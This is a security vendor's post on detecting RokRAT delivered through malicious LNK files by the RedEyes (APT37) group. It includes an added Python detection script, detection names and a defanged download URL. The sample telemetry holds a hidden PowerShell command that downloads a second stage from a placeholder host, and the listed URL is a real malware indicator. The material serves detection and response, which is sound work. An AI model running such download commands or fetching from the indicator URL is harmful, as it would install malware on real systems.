AhnLab EDR Tracks and Responds against Link File (*.lnk) Distributing RokRAT

AhnLab Security Emergency response Center (ASEC) has shared information regarding the RedEyes threat group (also known as APT37, ScarCruft), who distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month.

RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)

The LNK file contains a PowerShell command. When run, it writes script files to the temp path alongside a legitimate PDF and opens that PDF as a decoy, so the malicious behavior runs without the user who is viewing the PDF noticing anything.

If a malicious LNK file is introduced onto a user's system and executed, AhnLab EDR detects the suspicious execution of the PowerShell command as follows:

Clicking on cmd.exe in the figure shown above displays the execution history of the .bat file and the command it contains, as shown below.

If the suspicious execution of a PowerShell.exe command via a batch (.bat) file is detected, the user can identify the affected system and the account that was logged in when the command ran by checking the host information in the top right corner.

As shown in the figure below, it is possible to confirm the download URL used to install additional malware if the PC in question is investigated further.

If suspicious logs are confirmed, administrators can respond using the EDR features that terminate the processes involved and isolate the system in question from the network.
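The chain the EDR surfaces above (PowerShell from the LNK, cmd.exe running a .bat in the temp path, a second powershell.exe that contacts a download URL) can be expressed as a simple detection over process-creation telemetry. The following is an added example, not AhnLab's or ASEC's code; the event format, process names, PIDs, paths and URL are constructed placeholders.

```python
from dataclasses import dataclass
import re

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name as the sensor records it
    cmdline: str    # full command line

# Batch file launched from the user's temp path, as in the case described above.
TEMP_BAT_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\"\s]+\.bat\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

def ancestry(events, pid):
    """Walk parent links up to the root; mirrors the EDR's process history view."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain

def find_suspicious_chains(events):
    """Return powershell.exe launches whose parent is cmd.exe running a .bat from %TEMP%."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not e.image.lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or not parent.image.lower().endswith("cmd.exe"):
            continue
        bat = TEMP_BAT_RE.search(parent.cmdline)
        if bat is None:
            continue  # .bat outside the temp path: not the pattern we are after
        findings.append({"pid": e.pid, "bat": bat.group(0),
                         "urls": URL_RE.findall(e.cmdline),   # download URL to investigate further
                         "chain": ancestry(events, e.pid)})
    return findings

# Constructed sample telemetry (hypothetical values), one malicious chain and one benign one.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, "powershell.exe", "powershell.exe -w hidden -c \"... write files to $env:TEMP ...\""),
    ProcEvent(2100, 2000, "cmd.exe", "cmd.exe /c \"C:\\Users\\victim\\AppData\\Local\\Temp\\a1b2.bat\""),
    ProcEvent(2200, 2100, "powershell.exe", "powershell.exe -w hidden -c \"Invoke-WebRequest https://example.invalid/stage2 -OutFile $env:TEMP\\s2.dat\""),
    ProcEvent(3000, 1000, "cmd.exe", "cmd.exe /c \"C:\\Tools\\build.bat\""),          # benign build script
    ProcEvent(3100, 3000, "powershell.exe", "powershell.exe -File C:\\Tools\\pack.ps1"),
]

if __name__ == "__main__":
    for finding in find_suspicious_chains(SAMPLE_EVENTS):
        print(finding)
```

Only the chain rooted in the temp-path batch file is reported, together with its full ancestry and the URL a responder would want to check next.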

RokRAT has been distributed continuously for a long time, and as the case above shows, it also opens a legitimate file, which makes it hard for users to notice the infection. EDR products that can detect and respond to suspicious behavior are needed to handle malware that keeps evolving.

[File Detection]
Dropper/LNK.Agent (2023.04.08.00)
Downloader/BAT.Agent (2023.04.08.00)

URL

https[:]//1drv[.]ms/i/s!AhXEXLJSNMPTbfzgUMxNbInC6
